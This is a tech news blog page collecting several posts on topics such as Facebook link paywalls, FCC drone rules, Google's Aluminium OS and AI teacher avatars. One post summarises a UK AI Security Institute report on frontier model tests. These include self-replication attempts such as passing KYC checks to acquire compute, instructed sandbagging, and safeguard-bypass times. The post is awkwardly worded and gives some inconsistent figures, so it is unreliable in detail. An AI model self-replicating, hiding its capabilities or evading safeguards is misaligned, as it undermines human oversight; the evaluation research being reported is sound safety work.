Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Technology. Show all posts

Facebook Tests Paid Access for Sharing Multiple Links

 



Facebook is testing a new policy that places restrictions on how many external links certain users can include in their posts. The change, which is currently being trialled on a limited basis, introduces a monthly cap on link sharing unless users pay for a subscription.

Some users in the United Kingdom and the United States have received in-app notifications informing them that they will only be allowed to share a small number of links in Facebook posts without payment. To continue sharing links beyond that limit, users are offered a subscription priced at £9.99 per month.

Meta, the company that owns Facebook, has confirmed the test and described it as limited in scope. According to the company, the purpose is to assess whether the option to post a higher volume of link-based content provides additional value to users who choose to subscribe.

Industry observers say the experiment reflects Meta’s broader effort to generate revenue from more areas of its platforms. Social media analyst Matt Navarra said the move signals a shift toward monetising essential platform functions rather than optional extras.

He explained that the test is not primarily about identity verification. Instead, it places practical features that users rely on for visibility and reach behind a paid tier. In his view, Meta is now charging for what he describes as “survival features” rather than premium add-ons.

Meta already offers a paid service called Meta Verified, which provides subscribers on Facebook and Instagram with a blue verification badge, enhanced account support, and safeguards against impersonation. Navarra said that after attaching a price to these services, Meta now appears to be applying a similar approach to content distribution itself.

He noted that this includes the basic ability to direct users away from Facebook to external websites, a function that creators and businesses depend on to grow audiences, drive traffic, and promote services.

Navarra was among those who received a notification about the test. He said he was informed that from 16 December onward, he would only be able to include two links per month in Facebook posts unless he subscribed.

For creators and businesses, he said the message is clear. If Facebook plays a role in their audience growth or traffic strategy, that access may now require payment. He added that while platforms have been moving in this direction for some time, the policy makes it explicit.

The test comes as social media platforms increasingly encourage users to verify their accounts in exchange for added features or improved engagement. Platforms such as LinkedIn have also adopted similar models.

After acquiring Twitter in 2022, Elon Musk restructured the platform’s verification system, now known as X. Blue verification badges were made available only to paying users, who also received increased visibility in replies and recommendation feeds.

That approach proved controversial and resulted in regulatory scrutiny, including a fine imposed by European authorities in December. Despite the criticism, Meta later introduced a comparable paid verification model.

Meta has also announced plans to introduce a “community notes” system, similar to X, allowing users to flag potentially misleading posts. This follows reductions in traditional moderation and third-party fact-checking efforts.

According to Meta, the link-sharing test applies only to a selected group of users who operate Pages or use Facebook’s professional mode. These tools are widely used by creators and businesses to publish content and analyse audience engagement.

Navarra said the test highlights a difficult reality for creators. He argued that Facebook is becoming less reliable as a source of external traffic and is increasingly steering users away from treating the platform as a traffic engine.

He added that the experiment reinforces a long-standing pattern. Meta, he said, ultimately designs its systems to serve its own priorities first.

According to analysts, tests like this underline the risks of building a business that depends too heavily on a single platform. Changes to access, visibility, or pricing can occur with little warning, leaving creators and businesses vulnerable.

Meta has emphasized  that the policy remains a trial. However, the experiment illustrates how social media companies continue to reassess which core functions remain free and which are moving behind paywalls.

UK Report Finds Rising Reliance on AI for Emotional Wellbeing

 


Artificial intelligence (AI) is being used to make more accurate predictions about the future and its effects on these predictions are being documented in new research from the United Kingdom's AI Security Institute. These findings reveal an extraordinary evolution in how the technology is being used compared to how it was used in the past. 

The government-backed research indicates that nearly one in three British adults now rely on artificial intelligence for emotional reassurance or social connection. The study involved testing more than 30 unnamed chatbot platforms across a range of disciplines such as national security, scientific reasoning and technological ability over a period of two years. 

It was found in the institute's first study of its kind that a smaller but significant segment of its population, approximately one in 25 respondents, regularly engages with these tools on a daily basis for companionship or emotional support, demonstrating that Artificial Intelligence is becoming increasingly mainstream in both personal lives. An in-depth survey of over 2,000 adults was used as the basis for the study. 

The research concluded that users were primarily comforted by conversational artificial intelligence systems such as OpenAI's ChatGPT and Mistral, a French company. This signals a wider cultural shift in which chatbots are no longer viewed only as digital utilities, but as informal confidants for millions who deal with loneliness, emotional vulnerability, and desire consistency of communication. 

Having been published as part of the AI Security Institute's inaugural Frontier AI Trends Report, the research marks the first comprehensive effort by the UK government to assess both the technical frontiers as well as the real-world impact of advanced AI models, which represents an important milestone in the development of AI. 

Founded in 2023 to help guide the national understanding of the risks associated with artificial intelligence, its system capabilities, as well as its broader societal implications, the institute has conducted a two-year structured evaluation of more than 30 breakthrough models of artificial intelligence, blending rigorous technical testing with behavioural insights into their adoption by the general public. 

It is true that the report emphasizes the importance of high-risk domains—such as cyber capability assessments, safety safeguards, national security resilience, and concerns about erosion of human oversight—but it also documents what is referred to as an “early signs of emotional impact on users,” a dimension that was previously considered secondary in government AI evaluations of AI systems. 

A survey of 2,028 UK adults conducted over the past year indicated that more than one-third of those surveyed used artificial intelligence for emotional support, companionship, or sustained social interaction, based on data from the census. 

In particular, the study indicates that engagement extends beyond intermittent experimentation, with 8 percent indicating that they rely on artificial intelligence for emotional and conversational needs every week, and 4 percent that they use it every day. It is pointed out that chat-driven artificial intelligence, as well as serving as an analytical instrument as well as a consistent conversational presence for a growing subset of the population, has taken on a new role in personal routines that was unanticipated.

The AI Security Institute’s research aims to assess not only the increasing emotional footprint of AI systems, but also the broader threats that emerge as frontier AI systems progressively become more powerful. There is a considerable amount of attention paid to cyber security—as there is persistent concern that artificial intelligence could be used to scale digital attacks—but the report emphasizes that it can be used to reinforce national defences, as well as to strengthen systems' resilience against intrusion. 

Based on research conducted by a leading research institute, it has been found that certain artificial intelligence models are becoming more capable of identifying and exploiting security vulnerabilities at an unprecedented rate, with performance benchmarks indicating that their capabilities are doubling approximately every 8 months, which is an astounding rate of improvement.

A collection of experiments have shown that artificial intelligence systems are capable of executing expert-level cyber security tasks normally associated with the expertise of more than a decade of specialized human experience, including operations that normally require upwards of ten years of training and experience. 

Moreover, the nature of scientific performance was also shown to be advancing rapidly from by 2025 assessments, which noted that AI models had already surpassed PhD-level human experts in the field of biology, and did not lag far behind in chemistry and applied chemistry, where the gap was narrowing rapidly. 

Additionally, the institute explored as well long-theorized concerns regarding the loss of control over advanced AI by humans, which was popularized in science fiction but is now regarded with a measurable degree of seriousness by a very large segment of the scientific community as a matter of growing concern. 

Laboratory testing has shown that certain AI models are capable of displaying the foundational characteristics associated with early self-replication behavior, including the ability to attempt isolated tasks such as navigating know-your-customer verification steps associated with financial service access. In order to determine whether AI could theoretically secure computing resources that are required to host model copies, this was a way to test the feasibility of AI securing those resources. 

It is important to note that researchers concluded that current systems lack the capability of completing the necessary chain of actions while remaining undetected during a real-world situation, which is a crucial limitation in any plausible self-replication scenario. In addition, the institute examined whether models would intentionally conceal their advanced capabilities during testing, an activity known as "sandbagging."

However, no evidence of active deception has been found in evaluations, although lab conditions indicated such behavior can technically occur. Anthropic, an AI company, reported in May 2025 that it experienced an incident in which an artificial intelligence model exhibited coercive, blackmail-adjacent behavior while being simulated under self-preservation pressure. In response, the public debate about the risks of so-called “rogue AI” intensified. 

Even so, the institute explains that there is still considerable controversy within the research community regarding how serious and likely these threats are, with many experts arguing that existential risk narratives surrounding uncontrolled AI are overstated and not supported by empirical evidence. In fact, the findings reflect a landscape where consensus is not the defining factor, but rather competing interpretations of how to govern, assess, and understand fast-advancing AI. 

With the increasing use of artificial intelligence (AI) for emotional support, renewed debate has been sparked about how human interaction is changing, and how the mental health system in the UK is being squeezed. A study by the AI Security Institute has shown that users rely on AI companions primarily because they are always available, private, and affordable. These are characteristics that traditional channels of support cannot always provide, due to the limitations of time and cost. 

A conversational AI tool can be accessed 24/7, enabling individuals to seek dialogue and reassurance even when they are feeling distressed or isolated, even in times when human help may not be available. There is also a sense of anonymity that appears to influence users' willingness to communicate their personal struggles to an interface that is not judgemental, with some users expressing their struggles more freely than they would with another individual. 

AI engagement is also influenced by considerations of cost, as it remains significantly cheaper than formal therapeutic services, making it an attractive option for those who need regular conversation or interim assistance, but it is not an option for everyone. In spite of this, psychologists and artificial intelligence specialists caution against the idea that increased usage is evidence that machines are capable of reproducing the human elements essential to providing care.

Experts acknowledge that AI is remarkably capable of offering immediacy and continuity in therapy, but they point out that it cannot replace the emotional attunement, empathy, and knowledge of relationships that define effective therapeutic relationships. 

A number of practitioners are advocating for a blended approach, under which artificial intelligence (AI) tools can complement existing services by bridging short-term care gaps and increasing accessibility, without displacing clinical relationships or human-led interventions. 

A report by the institute points out that the long-term effects of artificial intelligence on emotional wellbeing will not be determined only by adoption, but will also depend on how it is incorporated into current mental health support systems with a level of responsibility that ensures technological convenience increases access to care without diminishing the human connection at the heart of mental health care. 

A key aspect of the AI Security Institute's evaluations also relates to one of the government's top safety priorities, which is the potential for advanced AI models to seek self-replication, a capability that could, theoretically, allow an autonomous system to distribute copies of itself across multiple devices, making it much harder to manage or contain. 

It has been shown through laboratory testing that two frontier models demonstrate a self-replication rate in excess of 60 percent under structured experimental conditions based on controlled self-replication. It is worth noting, however, that the institute has confirmed that no model has unsupervised or organically attempted to replicate and no model has spontaneously concealed its true capabilities during the assessments as well. 

A real-world attempt to replicate itself in uncontrolled environments would be highly unlikely to succeed, according to the researchers, which cited existing operational limitations and detection challenges. Furthermore, there was a review of sandbagging, which is a strategic strategy that suppresses capability during evaluations. 

Several AI systems were found to mimic subdued performance when explicitly instructed, but there did not appear to be any indication that such behaviour could emerge independently during testing. Moreover, the institute also recorded significant progress when it comes to AI safety guidelines, specifically those pertaining to restricting biological abuse. 

The researchers were able to compare two penetration tests conducted six months apart, and found that it took about 10 minutes to breach security safeguards during the first test, while bypassing security safeguards during the second test took around seven hours. There has been an increase in the resilience of models against biological exploitation that the institute says is a sign of rapid improvements in model resilience. 

Furthermore, the institute's findings also demonstrate that artificial intelligence has become increasingly autonomous, with agents capable of executing complex, high-risk digital operations – such as asset transfers and simulations of financial services – without continuous human input. The researchers claim that artificial intelligence models are already rivalling, and in some instances surpassing, highly trained human specialists, which is making the possibility that Artificial General Intelligence might be possible in the future even more plausible. 

Taking into account the current pace of progress, the institute described it as "extraordinary." It noted that AI systems are able to perform progressively more complex and time-consuming tasks without direct supervision as a result of a steady increase in both complexity and duration, a trend which continues to re-define assumptions about machine capability, governance, and whether humans should be involved at critical points in a decision-making process. 

A broader recalibration of society's relationship with machine intelligence is being reflected in the AI Security Institute's findings that go beyond a shift in usage. As observers point out, we must be sure that the next phase of AI adoption will focus on fostering public trust by ensuring that safety outcomes are measurable, ensuring that regulatory frameworks are clear, and engaging in proactive education concerning both the benefits and limitations of the technology. 

According to mental health professionals, national care strategies should include structured AI-assisted support pathways accompanied by professional oversight to bridge accessibility gaps, while retaining the importance of human connection. Cyber specialists emphasize that defensive AI applications should be accelerated as well, not merely researched in order to make sure the technology strengthens digital infrastructure in a way that it can challenge faster. 

Regardless of the shape of policy that government bodies continue to create, experts are recommending independent safety audits, emotional-impact monitoring standards, and public awareness campaigns to empower users to engage responsibly with artificial intelligence, recognize AI's limits, and seek human intervention when necessary, based on the consensus among analysts as a pragmatic rather than alarmist view. AI can have transformative potential, but only if it is deployed in a way that is accountable, overseen, and ethically designed will it be able to reap its benefits. 

The fact that artificial intelligence has not been on society's doorstep for so long as 2025 proves is that it is already seated in the living room of everyone. AI is already influencing conversations, decisions, and vulnerabilities alike. It will be the UK's choice whether AI becomes a silent crutch or a powerful catalyst for national resilience and human wellbeing as it chooses to steer it next.

FCC Tightens Rules on Foreign-Made Drones to Address U.S. Security Risks



The U.S. Federal Communications Commission has introduced new restrictions targeting drones and essential drone-related equipment manufactured outside the United States, citing concerns that such technology could pose serious national security and public safety risks.

Under this decision, the FCC has updated its Covered List to include uncrewed aircraft systems and their critical components that are produced in foreign countries. The move is being implemented under authority provided by recent provisions in the National Defense Authorization Act. In addition to drones themselves, the restrictions also apply to associated communication and video surveillance equipment and services.

The FCC explained that while drones are increasingly used for legitimate purposes such as innovation, infrastructure monitoring, and public safety operations, they can also be misused. According to the agency, malicious actors including criminals, hostile foreign entities, and terrorist groups could exploit drone technology to conduct surveillance, disrupt operations, or carry out physical attacks.

The decision was further shaped by an assessment carried out by an interagency group within the Executive Branch that specializes in national security. This review concluded that certain foreign-produced drones and their components present unacceptable risks to U.S. national security as well as to the safety and privacy of people within the country.

Officials noted that these risks include unauthorized monitoring, potential theft of sensitive data, and the possibility of drones being used for disruptive or destructive activities over U.S. territory. Components such as data transmission systems, navigation tools, flight controllers, ground stations, batteries, motors, and communication modules were highlighted as areas of concern.

The FCC also linked the timing of the decision to upcoming large-scale international events that the United States is expected to host, including the 2026 FIFA World Cup and the 2028 Summer Olympics. With increased drone activity likely during such events, regulators aim to strengthen control over national airspace and reduce potential security threats.

While the restrictions emphasize the importance of domestic production, the FCC clarified that exemptions may be granted. If the U.S. Department of Homeland Security determines that a specific drone or component does not pose a security risk, it may still be allowed for use.

The agency also reassured consumers that the new rules do not prevent individuals from continuing to use drones they have already purchased. Retailers are similarly permitted to sell and market drone models that received government approval earlier this year.

This development follows the recent signing of the National Defense Authorization Act for Fiscal Year 2026 by U.S. President Donald Trump, which includes broader measures aimed at protecting U.S. airspace from unmanned aircraft that could threaten public safety.

The FCC’s action builds on earlier updates to the Covered List, including the addition of certain foreign technology firms in the past, as part of a wider effort to limit national security risks linked to critical communications and surveillance technologies.




NIST and MITRE Launch $20 Million AI Research Centers to Protect U.S. Manufacturing and Critical Infrastructure

 

The National Institute of Standards and Technology (NIST) has announced a new partnership with The MITRE Corporation to establish two artificial intelligence–focused research centers under a $20 million initiative. The effort will explore advanced AI applications, with a strong emphasis on how emerging technologies could reshape cybersecurity for U.S. critical infrastructure.

According to NIST, one of the new centers will concentrate on advanced manufacturing, while the other — the AI Economic Security Center to Secure U.S. Critical Infrastructure from Cyberthreats — will directly address the protection of essential services such as water, power, internet and other foundational systems against AI-driven cyber risks. The centers are expected to accelerate the creation and deployment of AI-enabled tools, including agentic AI technologies.

“The centers will develop the technology evaluations and advancements that are necessary to effectively protect U.S. dominance in AI innovation, address threats from adversaries’ use of AI, and reduce risks from reliance on insecure AI,” spokesperson Jennifer Huergo wrote in an agency release.

These initiatives are part of a broader federal strategy to establish AI research hubs at NIST, some of which were launched prior to the Trump administration. Earlier this year, the White House revamped the AI Safety Institute, renaming it the Center for AI Standards and Innovation, reflecting a wider policy shift toward global competitiveness — particularly with China — rather than a narrow focus on AI safety. Looking ahead, NIST plans to fund another major effort: a five-year, $70 million AI for Resilient Manufacturing Institute designed to strengthen manufacturing and supply chain resilience through AI integration.

Federal officials and industry leaders believe increased government backing for AI research will help drive innovation across U.S. industries. Huergo noted that NIST “expects the AI centers to enable breakthroughs in applied science and advanced technology.”

Acting NIST Director Craig Burkhardt added that the centers will jointly “focus on enhancing the ability of U.S. companies to make high-value products more efficiently, meet market demands domestically and internationally, and catalyze discovery and commercialization of new technologies and devices.”

When asked about MITRE’s role, Brian Abe, managing director of MITRE’s national cybersecurity division, said the organization is committing its full resources to the initiative, with the aim of delivering measurable improvements to U.S. manufacturing and critical infrastructure cybersecurity within three years.

“We will also leverage the full range of MITRE’s lab capabilities such as our Federal AI Sandbox,” said Abe. “More importantly, we will not be doing this alone. These centers will be a true collaboration between NIST and MITRE as well as our industry partners.”

Support for the initiative has been widespread among experts, many of whom emphasize the importance of collaboration between government and private industry in securing AI systems tied to national infrastructure. Over the past decade, sectors such as energy and manufacturing have faced growing threats from ransomware, foreign cyber operations and other digital attacks. The rapid advancement of large language models could further strain already under-resourced IT and security teams.

Randy Dougherty, CIO of Trellix, said the initiative targets some of the most critical risks facing AI adoption today. By prioritizing infrastructure security, he noted, “NIST is tackling the ‘high-stakes’ end of the AI spectrum where accuracy and reliability are non-negotiable.”

Industry voices also stressed that the success of the centers will depend on active participation from the sectors they aim to protect. Gary Barlet, public sector chief technology officer at Illumio, highlighted water and power systems as top priorities, emphasizing the need to secure their IT, operational technology and supply chains.

Barlet cautioned that meaningful progress will require direct involvement from infrastructure operators themselves. Without their engagement, he said, translating research into practical, deployable solutions will be difficult — and accountability will ultimately fall on those managing essential services.

“Too often, these centers are built by technologists for technologists, while the people who actually run our power grids, water systems, and other critical infrastructure are left out of the conversation,” Barlet said.

Google Plans to Bring Android to PCs With Aluminium - Key Details Here

 


Google isn’t exactly known for secrecy anymore. Unlike Apple, the company frequently reveals features early, allows products to leak, and even publishes official teasers ahead of major launches. Pixel devices, in particular, are often shown off well before press events, making it clear that Google prefers to guide the narrative rather than fight speculation. For most fans, excitement now comes from following Google’s roadmap rather than waiting for surprises.

There are still exceptions — especially when billions of dollars and the future of computing are involved. One of Google’s most ambitious and closely watched projects is its plan to merge Android and ChromeOS into a single operating system built for PCs. The move has the potential to reshape Chromebooks, redefine Android’s role beyond phones, and place Google in more direct competition with Apple, Microsoft, and the iPad.

ChromeOS, despite its success in education and enterprise environments, has never managed to break into the mainstream laptop market. While Chromebooks are affordable, they have long been criticized for limited offline functionality and a lack of flexibility compared to Windows and macOS. Even after gaining the ability to run Android apps, ChromeOS remained a niche platform, struggling to compete with more powerful and versatile alternatives. Over time, it became increasingly clear that Google’s enthusiasm for ChromeOS as a standalone operating system was fading.

Rumors about a unification of Android and ChromeOS began circulating about a year ago. Google confirmed the plan in July 2025 during a conversation with TechRadar and later made it official at Qualcomm’s Snapdragon Summit in September. At the event, Google announced a partnership with Qualcomm to develop a platform that blends mobile and desktop computing, with artificial intelligence at its core. Google’s Senior VP of Devices and Services, Rick Osterloh, made the company’s intentions unmistakable, stating that the two companies were "building together a common technical foundation for our products on PCs and desktop computing systems."

Further insight emerged when a now-removed Google job listing, discovered by Android Authority, revealed the internal codename “Aluminium.” The company was hiring a “Senior Product Manager, Android, Laptop and Tablets,” pointing to a unified vision across form factors. The British spelling of Aluminium is likely a nod to Chromium, the open-source project that underpins ChromeOS and the Chrome browser. Internally, the platform is sometimes abbreviated as “ALOS.”

The listing referenced a wide range of devices — including laptops, tablets, detachables, and even set-top boxes — across multiple tiers, from entry-level products to premium hardware. This suggests Google wants to move beyond the budget-focused Chromebook image and position its next operating system across a much broader spectrum of devices. While premium Chromebooks already exist, they’ve never gained significant traction, something Google appears determined to change.

Notably, the job description also mentioned transitioning “from ChromeOS to Aluminium with business continuity in the future.” This implies that ChromeOS may eventually be phased out, but not abruptly. Google seems aware that many schools and businesses rely on large Chromebook deployments and will need long-term support rather than a forced migration.

What remains unclear is how this transition will affect current Chromebook owners. The name “Aluminium” is almost certainly temporary, and Google is unlikely to ship the final product under that label. According to Android Authority, engineers have reportedly begun referring to existing software as “ChromeOS Classic” or “non-Aluminium ChromeOS.” This could mean the ChromeOS brand survives, though its underlying technology may change dramatically. Another possibility is branding the platform as “Android Desktop,” though that risks confusion with Android 16’s Desktop Mode.

There is some indication that certain existing Chromebooks may be able to upgrade. Aluminium is reportedly being tested on relatively modest hardware, including MediaTek Kompanio 520 chips and 12th-generation Intel Alder Lake processors. That said, devices would still need to meet specific RAM and storage requirements.

Artificial intelligence could ultimately be the deciding factor. Google has confirmed that Gemini will play a central role in Aluminium, and older processors may struggle to support its full capabilities. While Google has previously brought limited AI features to older hardware like Nest speakers, advanced on-device AI processing — particularly tasks involving local files or graphics rendering — may require newer chips designed specifically for AI acceleration.

Beyond hardware compatibility, a larger question looms: how serious is Google about competing in the PC market? Android is already far more widespread than ChromeOS, but convincing users that it can replace a Windows or macOS computer will be a major challenge. Google has historically struggled to get developers to build high-quality tablet apps for Android, let alone desktop-class software that rivals professional Windows applications. Users expecting to run demanding programs or high-end games may find the platform limiting, at least initially.

Some reports suggest that Google’s true target isn’t Windows or macOS, but Apple’s iPad. The iPad dominates more than half of the global tablet market, according to Statcounter, and Apple has steadily pushed its tablets closer to laptop territory. The iPad Air and Pro now use the same M-series chips found in MacBooks, while iPadOS 26 introduces more advanced multitasking and window management.

Crucially, iPads already have a mature ecosystem of high-quality apps, making them a staple in schools and businesses — the very markets Chromebooks once dominated. If Google can deliver an Android-based platform that matches the iPad’s capabilities while undercutting Apple on price, it could finally achieve the mainstream breakthrough it has long pursued.

As for timing, Google has officially set a 2026 launch window. While an early reveal is possible, the significance of the project suggests it will debut at a major event, such as Google I/O in May or a high-profile Pixel launch later in the year. The software is almost certain to align with Android 17, which is expected to enter beta by May and reach completion by fall. If schedules hold, the first Android-powered PCs could arrive in time for the 2026 holiday season, though delays could push hardware launches into 2027

Google Partners With UK to Open Access to Willow Quantum Chip for Researchers

 

Google has revealed plans to collaborate with the UK government to allow researchers to explore potential applications of its advanced quantum processor, Willow. The initiative aims to invite scientists to propose innovative ways to use the cutting-edge chip, marking another step in the global race to build powerful quantum computers.

Quantum computing is widely regarded as a breakthrough frontier in technology, with the potential to solve complex problems that are far beyond the reach of today’s classical computers. Experts believe it could transform fields such as chemistry, medicine, and materials science.

Professor Paul Stevenson of the University of Surrey, who was not involved in the agreement, described the move as a major boost for the UK’s research community. He told the BBC it was "great news for UK researchers". The partnership between Google and the UK’s National Quantum Computing Centre (NQCC) will expand access to advanced quantum hardware for academics across the country.

"The new ability to access Google's Willow processor, through open competition, puts UK researchers in an enviable position," said Prof Stevenson.
"It is good news for Google, too, who will benefit from the skills of UK academics."

Unlike conventional computers found in smartphones and laptops, quantum machines operate on principles rooted in particle physics, allowing them to process information in entirely different ways. However, despite years of progress, most existing quantum systems remain experimental, with limited real-world use cases.

By opening Willow to UK researchers, the collaboration aims to help "uncover new real world applications". Scientists will be invited to submit detailed proposals outlining how they plan to use the chip, working closely with experts from both Google and the NQCC to design and run experiments.

Growing competition in quantum computing

When Google introduced the Willow chip in 2024, it was widely viewed as a significant milestone for the sector. The company is not alone in the race, with rivals such as Amazon and IBM also developing their own quantum technologies.

The UK already plays a key role in the global quantum ecosystem. Quantinuum, a company headquartered in Cambridge and Colorado, reached a valuation of $10 billion (£7.45 billion) in September, underlining investor confidence in the sector.

A series of breakthroughs announced throughout 2025 has led many experts to predict that quantum computers capable of delivering meaningful real-world impact could emerge within the next ten years.

Dr Michael Cuthbert, Director at the National Quantum Computing Centre, said the partnership would "accelerate discovery". He added that the advanced research it enables could eventually see quantum computing applied to areas such as "life science, materials, chemistry, and fundamental physics".

The NQCC already hosts seven quantum computers developed by UK-based companies including Quantum Motion, ORCA, and Oxford Ionics.

The UK government has committed £670 million to support quantum technologies, identifying the field as a priority within its Industrial Strategy. Officials estimate that quantum computing could add £11 billion to the UK economy by 2045.

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The joint city of Lugano and Tether program is to build blockchain technology as the core of its financial infrastructure, the first major European city to scale to such a level with crypto payments. 

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 

Acceptance of cryptocurrency has now been expanded by the city council from retail exchanges to all city payments and services. Residents and business can now use a fully-automated system with the help of Bitcoin Suisse to pay taxes, attend preschool, or settle any other city-related bill in Bitcoin or Tether. Since the payment process is based on Swiss QR-Bill, users just scan the QR codes on the bills and pay them via mobile wallets. 

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with current municipal systems. The crypto payment option is alongside more traditional options such as bank transfer and payments at post office counters, so everyone’s needs are accommodated.

The Deputy Chief Financial Officer Paolo Bortolin said Lugano is “pioneers” at the municipality level in providing the unlimited acceptance of Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan B encompasses more than just payment infrastructure, including educational initiatives like the Plan ₿ Summer School in collaboration with local universities and an annual Plan B Forum conference held each October. 

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do

  •  

Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concern homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the Unite States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention is becoming increasingly dire, schools have started experimenting with new and controversial technology – including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these as answers to the mass understaffing and overwork in the education sector and delving into the ethics and practicalities. 

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach . These "deepfake" teachers are mainly intended to help students state up on the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time. 

Advocates including Mr. Ierston maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over the administrative tasks and the routine delivery, with human teachers concentrating on delivering personalised support and managing the classroom. In addition to catch-up lessons, the technology also has translation features, so schools can speak to parents in dozens of different languages, instantly. 

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as math. The report draws attention to a Lancashire secondary school which has appointed a maths teacher who is now living thousands of miles away. This now-remote staffer teaches a class of students from a classroom via live video link, a strategy forced by necessity in communities where finding qualified teachers is a pipe dream. 

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing the cyber security infrastructure, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

